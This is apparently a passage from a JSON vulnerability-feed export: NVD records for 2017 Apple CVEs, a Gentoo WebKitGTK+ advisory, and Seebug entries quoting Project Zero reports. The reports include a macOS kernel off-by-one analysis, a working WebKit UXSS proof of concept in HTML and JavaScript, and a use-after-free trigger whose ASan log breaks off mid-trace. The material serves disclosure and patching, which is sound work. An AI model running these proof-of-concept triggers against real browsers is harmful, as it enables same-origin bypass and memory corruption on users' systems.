["CVE-2017-2407"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2407", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2407", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:50", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2465", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2465"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1", "cpe:/a:apple:safari:10.0.3"], "id": "CVE-2017-2465", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2465", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:17", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Security\" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (buffer overflow) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2451", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2451"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2451", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2451", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:27", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2455", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2455"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1", "cpe:/a:apple:safari:10.0.3"], "id": "CVE-2017-2455", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2455", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:47", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2464", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2464"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/a:apple:safari:10.0.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2464", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2464", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:15", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"CoreText\" component. It allows remote attackers to obtain sensitive information or cause a denial of service (out-of-bounds read and application crash) via a crafted font file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2450", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2450"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2450", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2450", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:51:36", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Kernel\" component. A buffer overflow allows attackers to execute arbitrary code in a privileged context via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2483", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2483"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2483", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2483", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}], "gentoo": [{"lastseen": "2022-01-17T19:05:18", "description": "### Background\n\nWebKitGTK+ is a full-featured port of the WebKit rendering engine.\n\n### Description\n\nMultiple vulnerabilities have been discovered in WebKitGTK+. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attack can use multiple vectors to execute arbitrary code or cause a denial of service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll WebKitGTK+ users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-libs/webkit-gtk-2.16.3:4\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-07T00:00:00", "type": "gentoo", "title": "WebKitGTK+: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2330", "CVE-2015-7096", "CVE-2015-7098", "CVE-2016-1723", "CVE-2016-1724", "CVE-2016-1725", "CVE-2016-1726", "CVE-2016-1727", "CVE-2016-1728", "CVE-2016-4692", "CVE-2016-4743", "CVE-2016-7586", "CVE-2016-7587", "CVE-2016-7589", "CVE-2016-7592", "CVE-2016-7598", "CVE-2016-7599", "CVE-2016-7610", "CVE-2016-7611", "CVE-2016-7623", "CVE-2016-7632", "CVE-2016-7635", "CVE-2016-7639", "CVE-2016-7640", "CVE-2016-7641", "CVE-2016-7642", "CVE-2016-7645", "CVE-2016-7646", "CVE-2016-7648", "CVE-2016-7649", "CVE-2016-7652", "CVE-2016-7654", "CVE-2016-7656", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2350", "CVE-2017-2354", "CVE-2017-2355", "CVE-2017-2356", "CVE-2017-2362", "CVE-2017-2363", "CVE-2017-2364", "CVE-2017-2365", "CVE-2017-2366", "CVE-2017-2367", "CVE-2017-2369", "CVE-2017-2371", "CVE-2017-2373", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2386", "CVE-2017-2392", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2457", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2481", "CVE-2017-2496", "CVE-2017-2504", "CVE-2017-2505", "CVE-2017-2506", "CVE-2017-2508", "CVE-2017-2510", "CVE-2017-2514", "CVE-2017-2515", "CVE-2017-2521", "CVE-2017-2525", "CVE-2017-2526", "CVE-2017-2528", "CVE-2017-2530", "CVE-2017-2531", "CVE-2017-2536", "CVE-2017-2539", "CVE-2017-2544", "CVE-2017-2547", "CVE-2017-2549", "CVE-2017-6980", "CVE-2017-6984"], "modified": "2017-06-07T00:00:00", "id": "GLSA-201706-15", "href": "https://security.gentoo.org/glsa/201706-15", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:00:17", "description": "SIOCSIFORDER and SIOCGIFORDER allow userspace programs to build and maintain the ifnet_ordered_head linked list of interfaces.\n\nSIOCSIFORDER clears the existing list and allows userspace to specify an array of interface indexes used to build a new list.\n\nSIOCGIFORDER allow userspace to query the list of interface identifiers used to build that list.\n\nHere's the relevant code for SIOCGIFORDER:\n\n`` case SIOCGIFORDER: { /_ struct if_order _/ struct if_order _ifo = (struct if_order _)(void *)data;\n \n \n u_int32_t ordered_count = if_ordered_count; <----------------- (a)\n \n if (ifo->ifo_count == 0 ||\n ordered_count == 0) {\n ifo->ifo_count = ordered_count;\n } else if (ifo->ifo_ordered_indices != USER_ADDR_NULL) {\n u_int32_t count_to_copy =\n MIN(ordered_count, ifo->ifo_count); <---------------- (b)\n size_t length = (count_to_copy * sizeof(u_int32_t));\n struct ifnet *ifp = NULL;\n u_int32_t cursor = 0;\n \n ordered_indices = _MALLOC(length, M_NECP, M_WAITOK);\n if (ordered_indices == NULL) {\n error = ENOMEM;\n break;\n }\n \n ifnet_head_lock_shared();\n TAILQ_FOREACH(ifp, &ifnet_ordered_head, if_ordered_link) {\n if (cursor > count_to_copy) { <------------------ (c)\n break;\n }\n ordered_indices[cursor] = ifp->if_index; <------------------ (d)\n cursor++;\n }\n ifnet_head_done();\n \n\n``\n\nat (a) it reads the actual length of the list (of course it should take the lock here too, but that's not the bug I'm reporting)\n\nat (b) it computes the number of entries it wants to copy as the minimum of the requested number and the actual number of entries in the list\n\nthe loop at (c) iterates through the list of all entries and the check at (c) is supposed to check that the write at (d) won't go out of bounds, but it should be a >=, not a >, as the cursor is the number of elements _already _ written. If count_to_copy is 0, and the cursor is 0, the write will still happen!\n\nBy requesting one fewer entries than are actually in the list the code will always write one interface index entry one off the end of the ordered_indices array.\n\nThis poc makes a list with 5 entries then requests 4. This allocates a 16-byte kernel buffer to hold the 4 entries then writes 5 entries into there.\n\ntested on MacOS 10.12.3 (16D32) on MacbookAir5,2\n\nAttachment: [sioctl_off_by_one. c](<https://bugs.chromium.org/p/project-zero/issues/attachment?aid=269350>)\n", "cvss3": {}, "published": "2017-04-04T00:00:00", "type": "seebug", "title": "MacOS/iOS kernel memory corruption due to off-by-one in SIOCGIFORDER socket ioctl (CVE-2017-2474)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2474"], "modified": "2017-04-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92890", "id": "SSV:92890", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T11:57:41", "description": "When an object element loads a JavaScript URL(e.g., javascript:alert(1)), it checks whether it violate the Same Origin Policy or not.\r\n\r\nHere's some snippets of the logic.\r\n```\r\nvoid HTMLObjectElement::updateWidget(CreatePlugins createPlugins)\r\n{\r\n ...\r\n String url = this->url(); \r\n ...\r\n if (!allowedToLoadFrameURL(url))\r\n return;\r\n ...\r\n\r\n bool beforeLoadAllowedLoad = guardedDispatchBeforeLoadEvent(url);\r\n ...\r\n\r\n bool success = beforeLoadAllowedLoad && hasValidClassId();\r\n if (success)\r\n success = requestObject(url, serviceType, paramNames, paramValues);\r\n ...\r\n}\r\n\r\nbool HTMLPlugInImageElement::allowedToLoadFrameURL(const String& url)\r\n{\r\n URL completeURL = document().completeURL(url);\r\n if (contentFrame() && protocolIsJavaScript(completeURL) && !document().securityOrigin().canAccess(contentDocument()->securityOrigin()))\r\n return false;\r\n return document().frame()->isURLAllowed(completeURL);\r\n}\r\n\r\nbool HTMLPlugInElement::requestObject(const String& url, const String& mimeType, const Vector<String>& paramNames, const Vector<String>& paramValues)\r\n{\r\n if (m_pluginReplacement)\r\n return true;\r\n\r\n URL completedURL;\r\n if (!url.isEmpty())\r\n completedURL = document().completeURL(url);\r\n\r\n ReplacementPlugin* replacement = pluginReplacementForType(completedURL, mimeType);\r\n if (!replacement || !replacement->isEnabledBySettings(document().settings()))\r\n return false;\r\n\r\n LOG(Plugins, \"%p - Found plug-in replacement for %s.\", this, completedURL.string().utf8().data());\r\n\r\n m_pluginReplacement = replacement->create(*this, paramNames, paramValues);\r\n setDisplayState(PreparingPluginReplacement);\r\n return true;\r\n}\r\n```\r\nThe SOP violation check is made in the method HTMLPlugInImageElement::allowedToLoadFrameURL.\r\n\r\nWhat I noticed is that there are two uses of |document().completeURL| for the same URL, and the method guardedDispatchBeforeLoadEvent dispatches a beforeloadevent that may execute JavaScript code after the SOP violation check. So if the base URL is changed like \"`javascript:///%0aalert(location);//`\" in the event handler, a navigation to the JavaScript URL will be made successfully.\r\n\r\nTested on Safari 10.0.3(12602.4.8).\r\n\r\n### PoC:\r\n```\r\n<html>\r\n<head>\r\n</head>\r\n<body>\r\n<script>\r\n\r\nlet o = document.body.appendChild(document.createElement('object'));\r\no.onload = () => {\r\n o.onload = null;\r\n\r\n o.onbeforeload = () => {\r\n o.onbeforeload = null;\r\n\r\n let b = document.head.appendChild(document.createElement('base'));\r\n b.href = 'javascript:///%0aalert(location);//';\r\n };\r\n o.data = 'xxxxx';\r\n};\r\n\r\no.type = 'text/html';\r\no.data = 'https://abc.xyz/';\r\n\r\n</script>\r\n</body>\r\n</html>\r\n```", "cvss3": {}, "published": "2017-05-26T00:00:00", "type": "seebug", "title": "WebKit: UXSS through HTMLObjectElement::updateWidget(CVE-2017-2493)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2493"], "modified": "2017-05-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93150", "id": "SSV:93150", "sourceData": "\n <html>\r\n<head>\r\n</head>\r\n<body>\r\n<script>\r\n\r\nlet o = document.body.appendChild(document.createElement('object'));\r\no.onload = () => {\r\n o.onload = null;\r\n\r\n o.onbeforeload = () => {\r\n o.onbeforeload = null;\r\n\r\n let b = document.head.appendChild(document.createElement('base'));\r\n b.href = 'javascript:///%0aalert(location);//';\r\n };\r\n o.data = 'xxxxx';\r\n};\r\n\r\no.type = 'text/html';\r\no.data = 'https://abc.xyz/';\r\n\r\n</script>\r\n</body>\r\n</html>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-93150", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T12:00:11", "description": "There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.\r\n\r\nPoC:\r\n\r\n```\r\n<script>\r\nfunction freememory() {\r\n var a;\r\n for(var i=0;i<100;i++) {\r\n a = new Uint8Array(1024*1024);\r\n }\r\n}\r\nfunction f1() {\r\n var iframe = document.getElementById(\"iframe\");\r\n iframe.srcdoc = \"x\";\r\n window.frames.event = window.event;\r\n freememory();\r\n}\r\nfunction f2() {\r\n var h = new XMLHttpRequest();\r\n h.onreadystatechange = f1;\r\n h.open(\"foo\",\"1\");\r\n var e = window.event;\r\n e.initEvent(\"1\",true,true);\r\n e.currentTarget.click();\r\n}\r\n</script>\r\n</head>\r\n<body onload=f1()>\r\n<iframe id=\"iframe\" onload=\"f2()\"></iframe>\r\n```\r\n\r\nASan log:\r\n\r\n```\r\n==25184==ERROR: AddressSanitizer: heap-use-after-free on address 0x61a000076e80 at pc 0x000115bea4e0 bp 0x7fff52cef2e0 sp 0x7fff52cef2d8\r\nREAD of size 8 at 0x61a000076e80 thread T0\r\n #0 0x115bea4df in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::EventTarget&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x138c4df)\r\n #1 0x115bc7b72 in WebCore::jsEventCurrentTargetGetter(JSC::ExecState&, WebCore::JSEvent&, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1369b72)\r\n #2 0x115bc4c06 in long long WebCore::BindingCaller<WebCore::JSEvent>::attribute<&(WebCore::jsEventCurrentTargetGetter(JSC::ExecState&, WebCore::JSEvent&, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, long long, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1366c06)\r\n #3 0x1121bd448 in JSC::PropertySlot::customGetter(JSC::ExecState*, JSC::PropertyName) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1587448)\r\n #4 0x111ef652e in llint_slow_path_get_by_id (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c052e)\r\n #5 0x111f13926 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12dd926)\r\n #6 0x111f17490 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12e1490)\r\n #7 0x111f10aca in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12daaca)\r\n #8 0x111bca172 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf94172)\r\n #9 0x111b4fa33 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf19a33)\r\n #10 0x11123d5c1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6075c1)\r\n #11 0x11123d6eb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6076eb)\r\n #12 0x11123da36 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x607a36)\r\n #13 0x1158ea62e in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x108c62e)\r\n #14 0x115bde086 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1380086)\r\n #15 0x115123415 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8c5415)\r\n #16 0x115122f3f in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8c4f3f)\r\n #17 0x1150ebe35 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x88de35)\r\n #18 0x1150ecf83 in 